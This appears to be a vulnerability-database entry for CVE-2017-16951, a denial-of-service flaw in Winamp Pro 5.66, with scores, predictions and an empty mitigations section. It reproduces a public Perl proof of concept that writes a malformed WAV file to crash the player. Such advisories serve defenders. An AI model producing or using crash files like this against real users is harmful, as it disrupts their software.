CVE-2017-16951
medium
CVSS v3
5.5
CVSS v4 NEW
โ
VIR risk
6.5
Description
Winamp Pro 5.66 Build 3512 allows remote attackers to cause a denial of service via a crafted WAV, WMV, AU, ASF, AIFF, or AIF file.
Predictions
Exploit likelihood
55%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Winamp Pro 5.66.Build.3512 - Denial of Service
#!/usr/bin/perl
# Exploit Title: Winamp Pro (.wav|.wmv|.au|.asf|.aiff|.aif ) Denial of Service
# Date: 2017-11-22
# Exploit Author: R.Yavari
# Version: v5.66.Build.3512
# Tested on: Windows 10 , Windows 7
# other version should be affected
# CVE-2017-16951
# http://meggamusic.co.uk/winamp/winamp5666_full_en-us_redux.exe
# (D.P)
open(code, ">winamp.wav") || die "can't create crash sample.$!";
binmode(code);
$data =
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" .
"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" .
"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" .
"\x13\x00\x13\x00\x12\x00\x14\x00\x14\x00";
print code $data;
close(code);Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| audiovalley | winamp_pro | 5.66 | |
References
CWEs
CWE-20
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.